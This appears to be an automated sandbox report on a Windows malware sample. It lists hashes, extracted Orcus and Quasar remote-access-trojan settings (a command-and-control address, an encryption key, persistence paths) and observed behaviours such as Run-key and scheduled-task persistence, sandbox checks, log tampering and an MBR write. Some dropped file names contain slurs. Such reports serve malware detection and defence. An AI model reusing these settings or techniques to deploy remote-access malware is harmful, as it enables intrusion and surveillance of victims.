Analysis
-
max time kernel
43s -
max time network
52s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250410-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250410-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
19/04/2025, 05:50
Static task
static1
Behavioral task
behavioral1
Sample
BootkitBuilded.exe
Resource
win10ltsc2021-20250410-en
General
-
Target
BootkitBuilded.exe
-
Size
2.0MB
-
MD5
99b124439bde7f750accb3a558644341
-
SHA1
09e26808c12e4d0508a7387b6ff59a745889568e
-
SHA256
bc3281aba1987ec4b1d4d68e99c8b6829d4fd54477db001bf331971b72789195
-
SHA512
9c01de8d170de66471aa37ab47bf3817580e152e82879523771a875be114a95b33a33b35d8ab512dea4a68568a8ef635c29f34a33cffb283ed422b4e29562cdf
-
SSDEEP
49152:PevRj2WXGkpogEPw0GuUUKqCMnFe3FSgEEEbJ:PEZLXz70G0AIKNS
Malware Config
Extracted
orcus
213.209.143.58:2095
8a98b570ecf9411bb051e6383f4a23c4
-
autostart_method
Registry
-
enable_keylogger
false
-
install_path
%programfiles%\Orcus\Orcus.exe
-
reconnect_delay
10000
-
registry_keyname
Orcus
-
taskscheduler_taskname
Orcus
-
watchdog_path
AppData\OrcusWatchdog.exe
Extracted
quasar
-
encryption_key
B3E34BC740FE48138878D8FFE23478A44299D77B
-
reconnect_delay
3000
Signatures
-
Orcus family
-
Orcus main payload 1 IoCs
resource yara_rule behavioral1/files/0x00070000000280ef-40.dat family_orcus -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x00070000000280ee-16.dat family_quasar behavioral1/memory/2836-45-0x000002779FFF0000-0x00000277A017E000-memory.dmp family_quasar -
Orcurs Rat Executable 3 IoCs
resource yara_rule behavioral1/files/0x00070000000280ef-40.dat orcus behavioral1/memory/5040-47-0x0000000000CF0000-0x0000000000DD8000-memory.dmp orcus behavioral1/memory/4356-1099-0x0000000000320000-0x0000000000408000-memory.dmp orcus -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\Control Panel\International\Geo\Nation jew.exe Key value queried \REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\Control Panel\International\Geo\Nation Orcus.exe Key value queried \REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\Control Panel\International\Geo\Nation OrcusWatchdog.exe Key value queried \REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\Control Panel\International\Geo\Nation BootkitBuilded.exe -
Executes dropped EXE 9 IoCs
pid Process 3136 Install.exe 2836 $77nigga.exe 5040 jew.exe 3164 Orcus.exe 2352 notfud.exe 4276 OrcusWatchdog.exe 4716 Orcus.exe 1304 OrcusWatchdog.exe 4356 Orcus.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Orcus = "\"C:\\Program Files (x86)\\Orcus\\Orcus.exe\"" Orcus.exe -
pid Process 556 powershell.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\D: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\T: svchost.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\Tasks\notfud svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Orcus\Orcus.exe jew.exe File created C:\Program Files (x86)\Orcus\Orcus.exe.config jew.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\SystemTemp msedge.exe File opened for modification C:\Windows\SystemTemp msedge.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Orcus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Orcus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OrcusWatchdog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Orcus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OrcusWatchdog.exe -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 1560 cmd.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 19 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895154779944181" msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1281280933-2069278784-2911492150-1000\{D88744F0-D8ED-403D-9CAB-9B172F35ECDE} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1281280933-2069278784-2911492150-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1281280933-2069278784-2911492150-1000\{4BBCD5B5-8E5F-44E0-8025-5E90639C099D} msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION wmiprvse.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4776 schtasks.exe 4684 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2352 notfud.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 556 powershell.exe 556 powershell.exe 556 powershell.exe 624 winlogon.exe 624 winlogon.exe 1304 OrcusWatchdog.exe 1304 OrcusWatchdog.exe 3164 Orcus.exe 3164 Orcus.exe 3164 Orcus.exe 1304 OrcusWatchdog.exe 3164 Orcus.exe 1304 OrcusWatchdog.exe 624 winlogon.exe 624 winlogon.exe 624 winlogon.exe 624 winlogon.exe 1304 OrcusWatchdog.exe 1304 OrcusWatchdog.exe 1304 OrcusWatchdog.exe 3164 Orcus.exe 3164 Orcus.exe 3164 Orcus.exe 624 winlogon.exe 624 winlogon.exe 624 winlogon.exe 624 winlogon.exe 3120 wmiprvse.exe 624 winlogon.exe 624 winlogon.exe 624 winlogon.exe 624 winlogon.exe 1304 OrcusWatchdog.exe 624 winlogon.exe 3164 Orcus.exe 624 winlogon.exe 1304 OrcusWatchdog.exe 3164 Orcus.exe 624 winlogon.exe 624 winlogon.exe 624 winlogon.exe 624 winlogon.exe 624 winlogon.exe 624 winlogon.exe 624 winlogon.exe 1304 OrcusWatchdog.exe 624 winlogon.exe 624 winlogon.exe 1304 OrcusWatchdog.exe 3164 Orcus.exe 3164 Orcus.exe 3120 wmiprvse.exe 3120 wmiprvse.exe 3120 wmiprvse.exe 3120 wmiprvse.exe 624 winlogon.exe 3120 wmiprvse.exe 624 winlogon.exe 3120 wmiprvse.exe 3120 wmiprvse.exe 624 winlogon.exe 624 winlogon.exe 3120 wmiprvse.exe 624 winlogon.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3648 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 3560 msedge.exe 3560 msedge.exe 3560 msedge.exe 3560 msedge.exe 3560 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2836 $77nigga.exe Token: SeDebugPrivilege 556 powershell.exe Token: SeDebugPrivilege 556 powershell.exe Token: SeDebugPrivilege 624 winlogon.exe Token: SeDebugPrivilege 2352 notfud.exe Token: SeDebugPrivilege 3164 Orcus.exe Token: SeDebugPrivilege 4276 OrcusWatchdog.exe Token: SeDebugPrivilege 1304 OrcusWatchdog.exe Token: SeShutdownPrivilege 3648 Explorer.EXE Token: SeCreatePagefilePrivilege 3648 Explorer.EXE Token: SeShutdownPrivilege 3648 Explorer.EXE Token: SeCreatePagefilePrivilege 3648 Explorer.EXE Token: SeShutdownPrivilege 3648 Explorer.EXE Token: SeCreatePagefilePrivilege 3648 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 1708 svchost.exe Token: SeIncreaseQuotaPrivilege 1708 svchost.exe Token: SeSecurityPrivilege 1708 svchost.exe Token: SeTakeOwnershipPrivilege 1708 svchost.exe Token: SeLoadDriverPrivilege 1708 svchost.exe Token: SeSystemtimePrivilege 1708 svchost.exe Token: SeBackupPrivilege 1708 svchost.exe Token: SeRestorePrivilege 1708 svchost.exe Token: SeShutdownPrivilege 1708 svchost.exe Token: SeSystemEnvironmentPrivilege 1708 svchost.exe Token: SeUndockPrivilege 1708 svchost.exe Token: SeManageVolumePrivilege 1708 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1708 svchost.exe Token: SeIncreaseQuotaPrivilege 1708 svchost.exe Token: SeSecurityPrivilege 1708 svchost.exe Token: SeTakeOwnershipPrivilege 1708 svchost.exe Token: SeLoadDriverPrivilege 1708 svchost.exe Token: SeSystemtimePrivilege 1708 svchost.exe Token: SeBackupPrivilege 1708 svchost.exe Token: SeRestorePrivilege 1708 svchost.exe Token: SeShutdownPrivilege 1708 svchost.exe Token: SeSystemEnvironmentPrivilege 1708 svchost.exe Token: SeUndockPrivilege 1708 svchost.exe Token: SeManageVolumePrivilege 1708 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1708 svchost.exe Token: SeIncreaseQuotaPrivilege 1708 svchost.exe Token: SeSecurityPrivilege 1708 svchost.exe Token: SeTakeOwnershipPrivilege 1708 svchost.exe Token: SeLoadDriverPrivilege 1708 svchost.exe Token: SeSystemtimePrivilege 1708 svchost.exe Token: SeBackupPrivilege 1708 svchost.exe Token: SeRestorePrivilege 1708 svchost.exe Token: SeShutdownPrivilege 1708 svchost.exe Token: SeSystemEnvironmentPrivilege 1708 svchost.exe Token: SeUndockPrivilege 1708 svchost.exe Token: SeManageVolumePrivilege 1708 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1708 svchost.exe Token: SeIncreaseQuotaPrivilege 1708 svchost.exe Token: SeSecurityPrivilege 1708 svchost.exe Token: SeTakeOwnershipPrivilege 1708 svchost.exe Token: SeLoadDriverPrivilege 1708 svchost.exe Token: SeSystemtimePrivilege 1708 svchost.exe Token: SeBackupPrivilege 1708 svchost.exe Token: SeRestorePrivilege 1708 svchost.exe Token: SeShutdownPrivilege 1708 svchost.exe Token: SeSystemEnvironmentPrivilege 1708 svchost.exe Token: SeUndockPrivilege 1708 svchost.exe Token: SeManageVolumePrivilege 1708 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1708 svchost.exe Token: SeIncreaseQuotaPrivilege 1708 svchost.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
pid Process 3164 Orcus.exe 3976 Conhost.exe 3560 msedge.exe 3560 msedge.exe 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3560 msedge.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3164 Orcus.exe 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 5932 taskmgr.exe 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 